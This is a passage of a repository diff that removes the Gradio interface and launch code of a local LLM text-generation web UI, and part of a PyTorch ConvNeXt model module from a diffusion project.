gr.State({'internal': [], 'visible': []}), - }) - - with gr.Tab('Text generation', elem_id='main'): - shared.gradio['display'] = gr.HTML(value=chat_html_wrapper({'internal': [], 'visible': []}, shared.settings['name1'], shared.settings['name2'], 'chat', 'cai-chat')) - shared.gradio['textbox'] = gr.Textbox(label='Input') - with gr.Row(): - shared.gradio['Stop'] = gr.Button('Stop', elem_id='stop') - shared.gradio['Generate'] = gr.Button('Generate', elem_id='Generate', variant='primary') - shared.gradio['Continue'] = gr.Button('Continue') - - with gr.Row(): - shared.gradio['Impersonate'] = gr.Button('Impersonate') - shared.gradio['Regenerate'] = gr.Button('Regenerate') - shared.gradio['Remove last'] = gr.Button('Remove last') - - with gr.Row(): - shared.gradio['Copy last reply'] = gr.Button('Copy last reply') - shared.gradio['Replace last reply'] = gr.Button('Replace last reply') - shared.gradio['Send dummy message'] = gr.Button('Send dummy message') - shared.gradio['Send dummy reply'] = gr.Button('Send dummy reply') - - with gr.Row(): - shared.gradio['Clear history'] = gr.Button('Clear history') - shared.gradio['Clear history-confirm'] = gr.Button('Confirm', variant='stop', visible=False) - shared.gradio['Clear history-cancel'] = gr.Button('Cancel', visible=False) - - with gr.Row(): - shared.gradio['start_with'] = gr.Textbox(label='Start reply with', placeholder='Sure thing!', value=shared.settings['start_with']) - - with gr.Row(): - shared.gradio['mode'] = gr.Radio(choices=['chat', 'chat-instruct', 'instruct'], value=shared.settings['mode'] if shared.settings['mode'] in ['chat', 'instruct', 'chat-instruct'] else 'chat', label='Mode', info='Defines how the chat prompt is generated. In instruct and chat-instruct modes, the instruction template selected under "Chat settings" must match the current model.') - shared.gradio['chat_style'] = gr.Dropdown(choices=utils.get_available_chat_styles(), label='Chat style', value=shared.settings['chat_style'], visible=shared.settings['mode'] != 'instruct') - - with gr.Tab('Chat settings', elem_id='chat-settings'): - - with gr.Tab("Character"): - with gr.Row(): - with gr.Column(scale=8): - with gr.Row(): - shared.gradio['character_menu'] = gr.Dropdown(value='None', choices=utils.get_available_characters(), label='Character', elem_id='character-menu', info='Used in chat and chat-instruct modes.', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['character_menu'], lambda: None, lambda: {'choices': utils.get_available_characters()}, 'refresh-button') - shared.gradio['save_character'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_character'] = gr.Button('🗑️', elem_classes='refresh-button') - - shared.gradio['name1'] = gr.Textbox(value=shared.settings['name1'], lines=1, label='Your name') - shared.gradio['name2'] = gr.Textbox(value=shared.settings['name2'], lines=1, label='Character\'s name') - shared.gradio['context'] = gr.Textbox(value=shared.settings['context'], lines=4, label='Context') - shared.gradio['greeting'] = gr.Textbox(value=shared.settings['greeting'], lines=4, label='Greeting') - - with gr.Column(scale=1): - shared.gradio['character_picture'] = gr.Image(label='Character picture', type='pil') - shared.gradio['your_picture'] = gr.Image(label='Your picture', type='pil', value=Image.open(Path('cache/pfp_me.png')) if Path('cache/pfp_me.png').exists() else None) - - with gr.Tab("Instruction template"): - with gr.Row(): - with gr.Row(): - shared.gradio['instruction_template'] = gr.Dropdown(choices=utils.get_available_instruction_templates(), label='Instruction template', value='None', info='Change this according to the model/LoRA that you are using. Used in instruct and chat-instruct modes.', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['instruction_template'], lambda: None, lambda: {'choices': utils.get_available_instruction_templates()}, 'refresh-button') - shared.gradio['save_template'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_template'] = gr.Button('🗑️ ', elem_classes='refresh-button') - - shared.gradio['name1_instruct'] = gr.Textbox(value='', lines=2, label='User string') - shared.gradio['name2_instruct'] = gr.Textbox(value='', lines=1, label='Bot string') - shared.gradio['context_instruct'] = gr.Textbox(value='', lines=4, label='Context') - shared.gradio['turn_template'] = gr.Textbox(value=shared.settings['turn_template'], lines=1, label='Turn template', info='Used to precisely define the placement of spaces and new line characters in instruction prompts.') - with gr.Row(): - shared.gradio['chat-instruct_command'] = gr.Textbox(value=shared.settings['chat-instruct_command'], lines=4, label='Command for chat-instruct mode', info='<|character|> gets replaced by the bot name, and <|prompt|> gets replaced by the regular chat prompt.') - - with gr.Tab('Chat history'): - with gr.Row(): - with gr.Column(): - shared.gradio['download'] = gr.File(label="Download") - shared.gradio['download_button'] = gr.Button(value='Refresh') - - with gr.Column(): - shared.gradio['upload_chat_history'] = gr.File(type='binary', file_types=['.json', '.txt'], label="Upload") - - with gr.Tab('Upload character'): - with gr.Tab('JSON'): - with gr.Row(): - shared.gradio['upload_json'] = gr.File(type='binary', file_types=['.json'], label='JSON File') - shared.gradio['upload_img_bot'] = gr.Image(type='pil', label='Profile Picture (optional)') - - shared.gradio['Submit character'] = gr.Button(value='Submit', interactive=False) - - with gr.Tab('TavernAI'): - with gr.Row(): - with gr.Column(): - shared.gradio['upload_img_tavern'] = gr.Image(type='pil', label='TavernAI PNG File', elem_id="upload_img_tavern") - shared.gradio['tavern_json'] = gr.State() - with gr.Column(): - shared.gradio['tavern_name'] = gr.Textbox(value='', lines=1, label='Name', interactive=False) - shared.gradio['tavern_desc'] = gr.Textbox(value='', lines=4, max_lines=4, label='Description', interactive=False) - - shared.gradio['Submit tavern character'] = gr.Button(value='Submit', interactive=False) - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Create notebook mode interface - elif shared.args.notebook: - shared.input_elements = ui.list_interface_input_elements() - shared.gradio['interface_state'] = gr.State({k: None for k in shared.input_elements}) - shared.gradio['last_input'] = gr.State('') - with gr.Tab("Text generation", elem_id="main"): - with gr.Row(): - with gr.Column(scale=4): - with gr.Tab('Raw'): - shared.gradio['textbox'] = gr.Textbox(value=default_text, elem_classes="textbox", lines=27) - - with gr.Tab('Markdown'): - shared.gradio['markdown_render'] = gr.Button('Render') - shared.gradio['markdown'] = gr.Markdown() - - with gr.Tab('HTML'): - shared.gradio['html'] = gr.HTML() - - with gr.Row(): - shared.gradio['Generate'] = gr.Button('Generate', variant='primary', elem_classes="small-button") - shared.gradio['Stop'] = gr.Button('Stop', elem_classes="small-button") - shared.gradio['Undo'] = gr.Button('Undo', elem_classes="small-button") - shared.gradio['Regenerate'] = gr.Button('Regenerate', elem_classes="small-button") - - with gr.Column(scale=1): - gr.HTML('
    ') - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - with gr.Row(): - shared.gradio['prompt_menu'] = gr.Dropdown(choices=utils.get_available_prompts(), value='None', label='Prompt', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['prompt_menu'], lambda: None, lambda: {'choices': utils.get_available_prompts()}, ['refresh-button', 'refresh-button-small']) - shared.gradio['save_prompt'] = gr.Button('💾', elem_classes=['refresh-button', 'refresh-button-small']) - shared.gradio['delete_prompt'] = gr.Button('🗑️', elem_classes=['refresh-button', 'refresh-button-small']) - - shared.gradio['count_tokens'] = gr.Button('Count tokens') - shared.gradio['status'] = gr.Markdown('') - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Create default mode interface - else: - shared.input_elements = ui.list_interface_input_elements() - shared.gradio['interface_state'] = gr.State({k: None for k in shared.input_elements}) - shared.gradio['last_input'] = gr.State('') - with gr.Tab("Text generation", elem_id="main"): - with gr.Row(): - with gr.Column(): - shared.gradio['textbox'] = gr.Textbox(value=default_text, elem_classes="textbox_default", lines=27, label='Input') - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - with gr.Row(): - shared.gradio['Generate'] = gr.Button('Generate', variant='primary') - shared.gradio['Stop'] = gr.Button('Stop') - shared.gradio['Continue'] = gr.Button('Continue') - shared.gradio['count_tokens'] = gr.Button('Count tokens') - - with gr.Row(): - shared.gradio['prompt_menu'] = gr.Dropdown(choices=utils.get_available_prompts(), value='None', label='Prompt', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['prompt_menu'], lambda: None, lambda: {'choices': utils.get_available_prompts()}, 'refresh-button') - shared.gradio['save_prompt'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_prompt'] = gr.Button('🗑️', elem_classes='refresh-button') - - shared.gradio['status'] = gr.Markdown('') - - with gr.Column(): - with gr.Tab('Raw'): - shared.gradio['output_textbox'] = gr.Textbox(elem_classes="textbox_default_output", lines=27, label='Output') - - with gr.Tab('Markdown'): - shared.gradio['markdown_render'] = gr.Button('Render') - shared.gradio['markdown'] = gr.Markdown() - - with gr.Tab('HTML'): - shared.gradio['html'] = gr.HTML() - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Model tab - with gr.Tab("Model", elem_id="model-tab"): - create_model_menus() - - # Training tab - with gr.Tab("Training", elem_id="training-tab"): - training.create_train_interface() - - # Session tab - with gr.Tab("Session", elem_id="session-tab"): - modes = ["default", "notebook", "chat"] - current_mode = "default" - for mode in modes[1:]: - if getattr(shared.args, mode): - current_mode = mode - break - - cmd_list = vars(shared.args) - bool_list = sorted([k for k in cmd_list if type(cmd_list[k]) is bool and k not in modes + ui.list_model_elements()]) - bool_active = [k for k in bool_list if vars(shared.args)[k]] - - with gr.Row(): - - with gr.Column(): - with gr.Row(): - shared.gradio['interface_modes_menu'] = gr.Dropdown(choices=modes, value=current_mode, label="Mode", elem_classes='slim-dropdown') - shared.gradio['reset_interface'] = gr.Button("Apply and restart", elem_classes="small-button", variant="primary") - shared.gradio['toggle_dark_mode'] = gr.Button('Toggle 💡', elem_classes="small-button") - - with gr.Row(): - with gr.Column(): - shared.gradio['extensions_menu'] = gr.CheckboxGroup(choices=utils.get_available_extensions(), value=shared.args.extensions, label="Available extensions", info='Note that some of these extensions may require manually installing Python requirements through the command: pip install -r extensions/extension_name/requirements.txt', elem_classes='checkboxgroup-table') - - with gr.Column(): - shared.gradio['bool_menu'] = gr.CheckboxGroup(choices=bool_list, value=bool_active, label="Boolean command-line flags", elem_classes='checkboxgroup-table') - - with gr.Column(): - if not shared.args.multi_user: - with gr.Row(): - shared.gradio['session_menu'] = gr.Dropdown(choices=utils.get_available_sessions(), value='None', label='Session', elem_classes='slim-dropdown', info='When saving a session, make sure to keep the initial part of the filename (session_chat, session_notebook, or session_default), otherwise it will not appear on this list afterwards.') - ui.create_refresh_button(shared.gradio['session_menu'], lambda: None, lambda: {'choices': utils.get_available_sessions()}, ['refresh-button']) - shared.gradio['save_session'] = gr.Button('💾', elem_classes=['refresh-button']) - shared.gradio['delete_session'] = gr.Button('🗑️', elem_classes=['refresh-button']) - - extension_name = gr.Textbox(lines=1, label='Install or update an extension', info='Enter the GitHub URL below and press Enter. For a list of extensions, see: https://github.com/oobabooga/text-generation-webui-extensions ⚠️ WARNING ⚠️ : extensions can execute arbitrary code. Make sure to inspect their source code before activating them.') - extension_status = gr.Markdown() - - extension_name.submit( - clone_or_pull_repository, extension_name, extension_status, show_progress=False).then( - lambda: gr.update(choices=utils.get_available_extensions(), value=shared.args.extensions), None, gradio('extensions_menu')) - - # Reset interface event - shared.gradio['reset_interface'].click( - set_interface_arguments, gradio('interface_modes_menu', 'extensions_menu', 'bool_menu'), None).then( - lambda: None, None, None, _js='() => {document.body.innerHTML=\'

    Reloading...

    \'; setTimeout(function(){location.reload()},2500); return []}') - - shared.gradio['toggle_dark_mode'].click(lambda: None, None, None, _js='() => {document.getElementsByTagName("body")[0].classList.toggle("dark")}') - - # chat mode event handlers - if shared.is_chat(): - shared.input_params = gradio('Chat input', 'start_with', 'interface_state') - clear_arr = gradio('Clear history-confirm', 'Clear history', 'Clear history-cancel') - shared.reload_inputs = gradio('history', 'name1', 'name2', 'mode', 'chat_style') - - gen_events.append(shared.gradio['Generate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: (x, ''), gradio('textbox'), gradio('Chat input', 'textbox'), show_progress=False).then( - chat.generate_chat_reply_wrapper, shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['textbox'].submit( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: (x, ''), gradio('textbox'), gradio('Chat input', 'textbox'), show_progress=False).then( - chat.generate_chat_reply_wrapper, shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Regenerate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - partial(chat.generate_chat_reply_wrapper, regenerate=True), shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Continue'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - partial(chat.generate_chat_reply_wrapper, _continue=True), shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Impersonate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: x, gradio('textbox'), gradio('Chat input'), show_progress=False).then( - chat.impersonate_wrapper, shared.input_params, gradio('textbox'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - shared.gradio['Replace last reply'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.replace_last_reply, gradio('textbox', 'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Send dummy message'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.send_dummy_message, gradio('textbox', 'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Send dummy reply'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.send_dummy_reply, gradio('textbox', 'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Clear history'].click(lambda: [gr.update(visible=True), gr.update(visible=False), gr.update(visible=True)], None, clear_arr) - shared.gradio['Clear history-cancel'].click(lambda: [gr.update(visible=False), gr.update(visible=True), gr.update(visible=False)], None, clear_arr) - shared.gradio['Clear history-confirm'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: [gr.update(visible=False), gr.update(visible=True), gr.update(visible=False)], None, clear_arr).then( - chat.clear_chat_log, gradio('interface_state'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Remove last'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.remove_last_message, gradio('history'), gradio('textbox', 'history'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['character_menu'].change( - partial(chat.load_character, instruct=False), gradio('character_menu', 'name1', 'name2'), gradio('name1', 'name2', 'character_picture', 'greeting', 'context', 'dummy')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.load_persistent_history, gradio('interface_state'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['Stop'].click( - stop_everything_event, None, None, queue=False, cancels=gen_events if shared.args.no_stream else None).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['mode'].change( - lambda x: gr.update(visible=x != 'instruct'), gradio('mode'), gradio('chat_style'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['chat_style'].change(chat.redraw_html, shared.reload_inputs, gradio('display')) - shared.gradio['instruction_template'].change( - partial(chat.load_character, instruct=True), gradio('instruction_template', 'name1_instruct', 'name2_instruct'), gradio('name1_instruct', 'name2_instruct', 'dummy', 'dummy', 'context_instruct', 'turn_template')) - - shared.gradio['upload_chat_history'].upload( - chat.load_history, gradio('upload_chat_history', 'history'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['Copy last reply'].click(chat.send_last_reply_to_input, gradio('history'), gradio('textbox'), show_progress=False) - - # Save/delete a character - shared.gradio['save_character'].click( - lambda x: x, gradio('name2'), gradio('save_character_filename')).then( - lambda: gr.update(visible=True), None, gradio('character_saver')) - - shared.gradio['delete_character'].click(lambda: gr.update(visible=True), None, gradio('character_deleter')) - - shared.gradio['save_template'].click( - lambda: 'My Template.yaml', None, gradio('save_filename')).then( - lambda: 'characters/instruction-following/', None, gradio('save_root')).then( - chat.generate_instruction_template_yaml, gradio('name1_instruct', 'name2_instruct', 'context_instruct', 'turn_template'), gradio('save_contents')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_template'].click( - lambda x: f'{x}.yaml', gradio('instruction_template'), gradio('delete_filename')).then( - lambda: 'characters/instruction-following/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - shared.gradio['download_button'].click(chat.save_history_at_user_request, gradio('history', 'character_menu', 'mode'), gradio('download')) - shared.gradio['Submit character'].click(chat.upload_character, gradio('upload_json', 'upload_img_bot'), gradio('character_menu')) - shared.gradio['upload_json'].upload(lambda: gr.update(interactive=True), None, gradio('Submit character')) - shared.gradio['upload_json'].clear(lambda: gr.update(interactive=False), None, gradio('Submit character')) - - shared.gradio['Submit tavern character'].click(chat.upload_tavern_character, gradio('upload_img_tavern', 'tavern_json'), gradio('character_menu')) - shared.gradio['upload_img_tavern'].upload(chat.check_tavern_character, gradio('upload_img_tavern'), gradio('tavern_name', 'tavern_desc', 'tavern_json', 'Submit tavern character'), show_progress=False) - shared.gradio['upload_img_tavern'].clear(lambda: (None, None, None, gr.update(interactive=False)), None, gradio('tavern_name', 'tavern_desc', 'tavern_json', 'Submit tavern character'), show_progress=False) - shared.gradio['your_picture'].change( - chat.upload_your_profile_picture, gradio('your_picture'), None).then( - partial(chat.redraw_html, reset_cache=True), shared.reload_inputs, gradio('display')) - - # notebook/default modes event handlers - else: - shared.input_params = gradio('textbox', 'interface_state') - if shared.args.notebook: - output_params = gradio('textbox', 'html') - else: - output_params = gradio('output_textbox', 'html') - - gen_events.append(shared.gradio['Generate'].click( - lambda x: x, gradio('textbox'), gradio('last_input')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - - gen_events.append(shared.gradio['textbox'].submit( - lambda x: x, gradio('textbox'), gradio('last_input')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - - if shared.args.notebook: - shared.gradio['Undo'].click(lambda x: x, gradio('last_input'), gradio('textbox'), show_progress=False) - shared.gradio['markdown_render'].click(lambda x: x, gradio('textbox'), gradio('markdown'), queue=False) - gen_events.append(shared.gradio['Regenerate'].click( - lambda x: x, gradio('last_input'), gradio('textbox'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - else: - shared.gradio['markdown_render'].click(lambda x: x, gradio('output_textbox'), gradio('markdown'), queue=False) - gen_events.append(shared.gradio['Continue'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, [shared.gradio['output_textbox']] + shared.input_params[1:], output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[1]; element.scrollTop = element.scrollHeight}") - ) - - shared.gradio['Stop'].click(stop_everything_event, None, None, queue=False, cancels=gen_events if shared.args.no_stream else None) - shared.gradio['prompt_menu'].change(load_prompt, gradio('prompt_menu'), gradio('textbox'), show_progress=False) - shared.gradio['save_prompt'].click( - lambda x: x, gradio('textbox'), gradio('save_contents')).then( - lambda: 'prompts/', None, gradio('save_root')).then( - lambda: utils.current_time() + '.txt', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_prompt'].click( - lambda: 'prompts/', None, gradio('delete_root')).then( - lambda x: x + '.txt', gradio('prompt_menu'), gradio('delete_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - shared.gradio['count_tokens'].click(count_tokens, gradio('textbox'), gradio('status'), show_progress=False) - - create_file_saving_event_handlers() - - shared.gradio['interface'].load(lambda: None, None, None, _js=f"() => {{{js}}}") - shared.gradio['interface'].load(partial(ui.apply_interface_values, {}, use_persistent=True), None, gradio(ui.list_interface_input_elements()), show_progress=False) - if shared.settings['dark_theme']: - shared.gradio['interface'].load(lambda: None, None, None, _js="() => document.getElementsByTagName('body')[0].classList.add('dark')") - - if shared.is_chat(): - shared.gradio['interface'].load(chat.redraw_html, shared.reload_inputs, gradio('display')) - - # Extensions tabs - extensions_module.create_extensions_tabs() - - # Extensions block - extensions_module.create_extensions_block() - - # Launch the interface - shared.gradio['interface'].queue() - with OpenMonkeyPatch(): - if shared.args.listen: - shared.gradio['interface'].launch(prevent_thread_lock=True, share=shared.args.share, server_name=shared.args.listen_host or '0.0.0.0', server_port=shared.args.listen_port, inbrowser=shared.args.auto_launch, auth=auth) - else: - shared.gradio['interface'].launch(prevent_thread_lock=True, share=shared.args.share, server_port=shared.args.listen_port, inbrowser=shared.args.auto_launch, auth=auth) - - -if __name__ == "__main__": - # Loading custom settings - settings_file = None - if shared.args.settings is not None and Path(shared.args.settings).exists(): - settings_file = Path(shared.args.settings) - elif Path('settings.yaml').exists(): - settings_file = Path('settings.yaml') - elif Path('settings.json').exists(): - settings_file = Path('settings.json') - - if settings_file is not None: - logger.info(f"Loading settings from {settings_file}...") - file_contents = open(settings_file, 'r', encoding='utf-8').read() - new_settings = json.loads(file_contents) if settings_file.suffix == "json" else yaml.safe_load(file_contents) - for item in new_settings: - shared.settings[item] = new_settings[item] - - # Set default model settings based on settings file - shared.model_config['.*'] = { - 'wbits': 'None', - 'model_type': 'None', - 'groupsize': 'None', - 'pre_layer': 0, - 'mode': shared.settings['mode'], - 'skip_special_tokens': shared.settings['skip_special_tokens'], - 'custom_stopping_strings': shared.settings['custom_stopping_strings'], - 'truncation_length': shared.settings['truncation_length'], - } - - shared.model_config.move_to_end('.*', last=False) # Move to the beginning - - # Default extensions - extensions_module.available_extensions = utils.get_available_extensions() - if shared.is_chat(): - for extension in shared.settings['chat_default_extensions']: - shared.args.extensions = shared.args.extensions or [] - if extension not in shared.args.extensions: - shared.args.extensions.append(extension) - else: - for extension in shared.settings['default_extensions']: - shared.args.extensions = shared.args.extensions or [] - if extension not in shared.args.extensions: - shared.args.extensions.append(extension) - - available_models = utils.get_available_models() - - # Model defined through --model - if shared.args.model is not None: - shared.model_name = shared.args.model - - # Select the model from a command-line menu - elif shared.args.model_menu: - if len(available_models) == 0: - logger.error('No models are available! Please download at least one.') - sys.exit(0) - else: - print('The following models are available:\n') - for i, model in enumerate(available_models): - print(f'{i+1}. {model}') - - print(f'\nWhich one do you want to load? 1-{len(available_models)}\n') - i = int(input()) - 1 - print() - - shared.model_name = available_models[i] - - # If any model has been selected, load it - if shared.model_name != 'None': - model_settings = get_model_settings_from_yamls(shared.model_name) - shared.settings.update(model_settings) # hijacking the interface defaults - update_model_parameters(model_settings, initial=True) # hijacking the command-line arguments - - # Load the model - shared.model, shared.tokenizer = load_model(shared.model_name) - if shared.args.lora: - add_lora_to_model(shared.args.lora) - - # Forcing some events to be triggered on page load - shared.persistent_interface_state.update({ - 'loader': shared.args.loader or 'Transformers', - }) - - if shared.is_chat(): - shared.persistent_interface_state.update({ - 'mode': shared.settings['mode'], - 'character_menu': shared.args.character or shared.settings['character'], - 'instruction_template': shared.settings['instruction_template'] - }) - - if Path("cache/pfp_character.png").exists(): - Path("cache/pfp_character.png").unlink() - - shared.generation_lock = Lock() - - # Launch the web UI - create_interface() - while True: - time.sleep(0.5) - if shared.need_restart: - shared.need_restart = False - time.sleep(0.5) - shared.gradio['interface'].close() - time.sleep(0.5) - create_interface() diff --git a/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py b/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py deleted file mode 100644 index 71956848b6631ecb7ae12b9d684e69e142a3ef45..0000000000000000000000000000000000000000 --- a/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py +++ /dev/null @@ -1,203 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. - -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - - -import torch -import torch.nn as nn -import torch.nn.functional as F -from timm.models.layers import trunc_normal_, DropPath -from timm.models.registry import register_model - -class Block(nn.Module): - r""" ConvNeXt Block. There are two equivalent implementations: - (1) DwConv -> LayerNorm (channels_first) -> 1x1 Conv -> GELU -> 1x1 Conv; all in (N, C, H, W) - (2) DwConv -> Permute to (N, H, W, C); LayerNorm (channels_last) -> Linear -> GELU -> Linear; Permute back - We use (2) as we find it slightly faster in PyTorch - - Args: - dim (int): Number of input channels. - drop_path (float): Stochastic depth rate. Default: 0.0 - layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6. - """ - def __init__(self, dim, drop_path=0., layer_scale_init_value=1e-6): - super().__init__() - self.dwconv = nn.Conv2d(dim, dim, kernel_size=7, padding=3, groups=dim) # depthwise conv - self.norm = LayerNorm(dim, eps=1e-6) - self.pwconv1 = nn.Linear(dim, 4 * dim) # pointwise/1x1 convs, implemented with linear layers - self.act = nn.GELU() - self.pwconv2 = nn.Linear(4 * dim, dim) - self.gamma = nn.Parameter(layer_scale_init_value * torch.ones((dim)), - requires_grad=True) if layer_scale_init_value > 0 else None - self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity() - - def forward(self, x): - input = x - x = self.dwconv(x) - x = x.permute(0, 2, 3, 1) # (N, C, H, W) -> (N, H, W, C) - x = self.norm(x) - x = self.pwconv1(x) - x = self.act(x) - x = self.pwconv2(x) - if self.gamma is not None: - x = self.gamma * x - x = x.permute(0, 3, 1, 2) # (N, H, W, C) -> (N, C, H, W) - - x = input + self.drop_path(x) - return x - -class ConvNeXt(nn.Module): - r""" ConvNeXt - A PyTorch impl of : `A ConvNet for the 2020s` - - https://arxiv.org/pdf/2201.03545.pdf - - Args: - in_chans (int): Number of input image channels. Default: 3 - num_classes (int): Number of classes for classification head. Default: 1000 - depths (tuple(int)): Number of blocks at each stage. Default: [3, 3, 9, 3] - dims (int): Feature dimension at each stage. Default: [96, 192, 384, 768] - drop_path_rate (float): Stochastic depth rate. Default: 0. - layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6. - head_init_scale (float): Init scaling value for classifier weights and biases. Default: 1. - """ - def __init__(self, in_chans=3, num_classes=1000, - depths=[3, 3, 9, 3], dims=[96, 192, 384, 768], drop_path_rate=0., - layer_scale_init_value=1e-6, head_init_scale=1., - ): - super().__init__() - - self.downsample_layers = nn.ModuleList() # stem and 3 intermediate downsampling conv layers - stem = nn.Sequential( - nn.Conv2d(in_chans, dims[0], kernel_size=4, stride=4), - LayerNorm(dims[0], eps=1e-6, data_format="channels_first") - ) - self.downsample_layers.append(stem) - for i in range(3): - downsample_layer = nn.Sequential( - LayerNorm(dims[i], eps=1e-6, data_format="channels_first"), - nn.Conv2d(dims[i], dims[i+1], kernel_size=2, stride=2), - ) - self.downsample_layers.append(downsample_layer) - - self.stages = nn.ModuleList() # 4 feature resolution stages, each consisting of multiple residual blocks - 